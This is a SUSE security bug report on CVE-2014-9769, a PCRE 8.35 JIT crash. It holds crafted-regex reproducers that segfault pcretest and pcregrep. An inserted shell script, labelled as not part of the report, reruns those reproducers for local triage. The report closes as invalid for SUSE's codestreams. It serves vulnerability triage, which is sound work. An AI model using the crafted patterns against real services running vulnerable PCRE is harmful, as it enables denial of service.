Bug 973012 (CVE-2014-9769) - VUL-0: CVE-2014-9769: pcre: Segmentation fault on crafted regex when JIT is used
Summary: VUL-0: CVE-2014-9769: pcre: Segmentation fault on crafted regex when JIT is used
Status: RESOLVED INVALID
Alias: CVE-2014-9769
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents
Version: unspecified
Hardware: Other Other
Priority: P3 - Medium    Severity: Normal
Target Milestone: ---
Assignee: Stephan Kulow
QA Contact: Security Team bot
URL: https://smash.suse.de/issue/164868/
Whiteboard: CVSSv2:NVD:CVE-2014-9769:7.5:(AV:N/A...
 
Reported: 2016-03-29 13:58 UTC by Victor Pereira
Modified: 2016-04-05 12:06 UTC

Found By: Security Response Team


Description Victor Pereira 2016-03-29 13:58:34 UTC
rh#1320995

pcre_jit_compile.c in PCRE 8.35 does not properly use table jumps to optimize
nested alternatives, which allows remote attackers to cause a denial of service
(stack memory corruption) or possibly have unspecified other impact via a
crafted string, as demonstrated by packets encountered by Suricata during use of
a regular expression in an Emerging Threats Open ruleset.

References:
https://bugzilla.redhat.com/show_bug.cgi?id=1320995
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9769
http://seclists.org/oss-sec/2016/q1/704
http://www.openwall.com/lists/oss-security/2016/03/26/1
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=819050
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9769
https://redmine.openinfosecfoundation.org/issues/1693
http://vcs.pcre.org/pcre?view=revision&revision=1475
Comment 1 Victor Pereira 2016-03-29 13:58:46 UTC
This was fixed with the upstream commit:

commit 60f995fc2f823183783633d5eb8af2eceb0bb663
Author: zherczeg <zherczeg@2f5784b3-3f2a-0410-8824-cb99058d5e15>
Date:   Fri Apr 25 11:59:19 2014 +0000

    Fixed an issue with nested table jumps.
    
    git-svn-id: svn://vcs.exim.org/pcre/code/trunk@1475 2f5784b3-3f2a-0410-8824-cb99058d5e15

and fixed in subsequent pcre-8.36 release.

Reproducer from the commit:

$ printf '%s\n%s\n' '/(?:x|(?:(xx|yy)+|x|x|x|x|x)|a|a|a)bc/' 'acb' | ./pcretest -s++
PCRE version 8.35 2014-04-04

  re> Segmentation fault (core dumped)
Comment 2 Swamp Workflow Management 2016-03-29 22:00:23 UTC
bugbot adjusting priority
Comment 3 Victor Pereira 2016-04-05 07:37:05 UTC
reproducer:

echo /a/eaa  |  pcregrep '\/(?:(?:s(?:ystem\/(?:logs|engine)\/[^\x2f]+?|e(?:rv(?:au|er)|ct)|gau\/.*?|alam|ucks|can|ke)|p(?:lugins\/content\/vote\/\.ssl\/[a-z0-9]|(?:rogcicic|atr)ic|osts?\/[a-z0-9]+)|(?=[a-z]*[0-9])(?=[0-9]*[a-z])(?!setup\d+\.exe$)[a-z0-9]{5,10}|a(?:d(?:min\/images\/\w+|obe)|(?:sala|kee)m|live)|(?:i(?:mage\/flags|nvoice)|xml\/load)\/[^\x2f]+|d(?:o(?:c(?:\/[a-z0-9]+)?|ne)|bust)|m(?:edia\/files\/\w+|arch)|~.+?\/\.[^\x2f]+\/.+?|c(?:onfig|hris|alc)|u(?:swinz\w+|pdate)|Ozonecrytedserver|w(?:or[dk]|insys)|fa(?:cture|soo)|n(?:otepad|ach)|k(?:be|ey|is)|(?:tes|ve)t|ArfBtxz|office|yhaooo|[a-z]|etna|link|\d+)\.exe$|(?:(?=[a-z0-9]*?[3456789][a-z0-9]*?[3456789])(?=[a-z0-9]*?[h-z])[a-z0-9]{3,31}\+|PasswordRecovery|RemoveWAT|Dejdisc|Host\d+|Msword)\.exe)'
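The script below is an added triage example and is not part of this bug report, of PCRE, or of the SUSE security process. It automates the two reproducers quoted in comments 1 and 3 against the locally installed PCRE 8.x tools (`pcretest`, `pcregrep`) and classifies the outcome from the exit status, since a process killed by SIGSEGV exits with 128+11 = 139. It also reports the installed PCRE version and whether JIT is compiled in; the assumed `pcretest -C` output format ("PCRE version X.Y ..." on the first line and a "Just-in-time compiler support: available" line) is an assumption, and a version check alone is not a verdict, because distributions backport fixes (comment 5 shows SUSE's codestreams did not carry the affected code), which is why the script actually runs the crafted patterns.

```shell
#!/bin/sh
# Added triage script for CVE-2014-9769; not from the bug report or from PCRE.
# Runs the reproducers from comments 1 and 3 and classifies the result.

# Reproducer from upstream r1475 (comment 1): pattern and subject given to
# pcretest with -s++ (study with JIT forced).
CRAFTED_RE='/(?:x|(?:(xx|yy)+|x|x|x|x|x)|a|a|a)bc/'
CRAFTED_SUBJECT='acb'

# Reproducer from comment 3: the Emerging Threats style pattern fed to pcregrep.
ET_SUBJECT='/a/eaa'
ET_RE='\/(?:(?:s(?:ystem\/(?:logs|engine)\/[^\x2f]+?|e(?:rv(?:au|er)|ct)|gau\/.*?|alam|ucks|can|ke)|p(?:lugins\/content\/vote\/\.ssl\/[a-z0-9]|(?:rogcicic|atr)ic|osts?\/[a-z0-9]+)|(?=[a-z]*[0-9])(?=[0-9]*[a-z])(?!setup\d+\.exe$)[a-z0-9]{5,10}|a(?:d(?:min\/images\/\w+|obe)|(?:sala|kee)m|live)|(?:i(?:mage\/flags|nvoice)|xml\/load)\/[^\x2f]+|d(?:o(?:c(?:\/[a-z0-9]+)?|ne)|bust)|m(?:edia\/files\/\w+|arch)|~.+?\/\.[^\x2f]+\/.+?|c(?:onfig|hris|alc)|u(?:swinz\w+|pdate)|Ozonecrytedserver|w(?:or[dk]|insys)|fa(?:cture|soo)|n(?:otepad|ach)|k(?:be|ey|is)|(?:tes|ve)t|ArfBtxz|office|yhaooo|[a-z]|etna|link|\d+)\.exe$|(?:(?=[a-z0-9]*?[3456789][a-z0-9]*?[3456789])(?=[a-z0-9]*?[h-z])[a-z0-9]{3,31}\+|PasswordRecovery|RemoveWAT|Dejdisc|Host\d+|Msword)\.exe)'

# Map a shell exit status to a verdict. A process killed by a signal exits
# with 128+signum, so 139 is SIGSEGV (11); anything <= 128 means no crash
# (pcregrep exits 1 for "no match" and 2 for an error, neither is a crash).
classify_status() {
    st=$1
    if [ "$st" -eq 139 ]; then echo "crashed:SIGSEGV"
    elif [ "$st" -gt 128 ]; then echo "crashed:signal$((st - 128))"
    else echo "nocrash:exit$st"; fi
}

# "yes" if a PCRE version string (major.minor[.patch]) predates 8.36, the
# release that carries r1475 according to comment 1; "unknown" if unparsable.
version_before_fix() {
    awk -v v="$1" 'BEGIN {
        n = split(v, a, ".")
        if (n < 2) { print "unknown"; exit }
        if (a[1] + 0 < 8 || (a[1] + 0 == 8 && a[2] + 0 < 36)) print "yes"; else print "no"
    }'
}

# Installed version, parsed from the first line of `pcretest -C`
# (assumed format: "PCRE version 8.35 2014-04-04").
pcre_version() {
    command -v pcretest >/dev/null 2>&1 || { echo "unknown"; return 0; }
    pcretest -C 2>/dev/null | sed -n '1s/^PCRE version \([0-9][0-9.]*\).*/\1/p' | grep . || echo "unknown"
}

# Whether this build has the JIT compiled in (assumed `pcretest -C` wording).
jit_available() {
    command -v pcretest >/dev/null 2>&1 || { echo "unknown"; return 0; }
    if pcretest -C 2>/dev/null | grep -q 'Just-in-time compiler support: available'; then
        echo "yes"; else echo "no"; fi
}

# Comment 1 reproducer. The `|| st=$?` keeps a crash from aborting the
# script under `set -e` and captures the status for classification.
run_pcretest_reproducer() {
    command -v pcretest >/dev/null 2>&1 || { echo "skipped:no-pcretest"; return 0; }
    st=0
    printf '%s\n%s\n' "$CRAFTED_RE" "$CRAFTED_SUBJECT" | pcretest -s++ >/dev/null 2>&1 || st=$?
    classify_status "$st"
}

# Comment 3 reproducer through pcregrep.
run_pcregrep_reproducer() {
    command -v pcregrep >/dev/null 2>&1 || { echo "skipped:no-pcregrep"; return 0; }
    st=0
    printf '%s\n' "$ET_SUBJECT" | pcregrep "$ET_RE" >/dev/null 2>&1 || st=$?
    classify_status "$st"
}

report() {
    v=$(pcre_version)
    printf 'PCRE version: %s (before 8.36 fix: %s), JIT compiled in: %s\n' \
        "$v" "$(version_before_fix "$v")" "$(jit_available)"
    printf 'pcretest reproducer (comment 1): %s\n' "$(run_pcretest_reproducer)"
    printf 'pcregrep reproducer (comment 3): %s\n' "$(run_pcregrep_reproducer)"
}

report
```

A "crashed:SIGSEGV" verdict on either reproducer is the finding; "nocrash" on a build whose version predates 8.36 is what a backported fix looks like and is consistent with comment 4's result on SLE12 and SLE-11-SP4.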
Comment 4 Victor Pereira 2016-04-05 09:20:28 UTC
I wasn't able to reproduce it on SLE12 and SLE-11-SP4.
Comment 5 Victor Pereira 2016-04-05 12:06:56 UTC
I wasn't able to find the vulnerable code in any of our codestreams. I will close this bug.